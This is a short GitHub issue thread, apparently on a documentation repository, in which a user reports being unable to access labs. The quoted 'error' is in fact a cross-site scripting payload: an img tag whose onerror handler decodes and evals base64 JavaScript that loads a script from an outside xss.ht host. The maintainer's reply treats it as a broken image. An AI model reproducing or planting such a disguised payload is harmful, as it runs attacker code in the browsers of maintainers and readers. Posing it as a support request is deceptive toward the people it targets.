### ISSUE TITLE
Can't access labs

### ISSUE THREAD

**Issue by ken8185** [celo-org/docs#399]
Hello, I'm experiencing technical difficulties, application throw the following error :-

"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZG9qaW55Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>

**Comment by joenyzio** [comment]
Hi @ken8185 - I cannot view this image. Are you able to provide additional information on the issue you are facing? Thanks!
